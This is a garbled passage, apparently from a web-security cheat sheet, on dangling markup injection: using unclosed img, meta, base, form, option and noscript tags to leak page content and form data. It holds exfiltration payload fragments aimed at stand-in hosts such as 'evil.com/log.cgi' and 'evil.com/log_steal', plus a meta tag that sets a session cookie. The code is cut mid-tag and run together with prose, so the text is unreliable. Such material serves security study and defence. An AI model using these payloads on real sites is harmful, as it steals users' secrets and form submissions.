<img src='http://evil.com/log.cgi?
when the page is loaded the victim will send you all the code between the injected img
tag and the next quote inside the code. If a secret is somehow located in that chunk, you will steal i t(you can do the same thing using a double quote,take a look which could be more interesting to use).img
tag is forbidden (due to CSP for example) you can also use <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?
@import
(will send all the code until it find a ";")<table
:<base
tag. All the information will be sent until the quote is closed but it requires some user interaction (the user must click in some link, because the base tag will have changed the domain pointed by the link):<form action='update_profile.php'>
) will send the data to the malicious domain.<form action='http://evil.com/log_steal'>
this will overwrite the next form header and all the data from the form will be sent to the attacker.<option>
tag. All the data until a closed </option>
is found will be sent:<noscript></noscript>
Is a tag whose content will be interpreted if the browser doesn't support javascript (you can enable/disable Javascript in Chrome in chrome://settings/content/javascript).target
attribute inside the base
tag will contain HTML content until the next single quote.
This will make that the value of window.name
if the link is clicked is going to be all that HTML content. Therefore, as you control the page where the victim is accessing by clicking the link, you can access that window.name
and exfiltrate that data:meta http-equiv
to perform several actions like setting a Cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1">
or performing a redirect (in 5s in this case): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />
Content-Security-Policy: default-src 'self';
, or Content-Security-Policy: http-equiv 'self';
)chrome://flags/#enable-portals
or it won't work.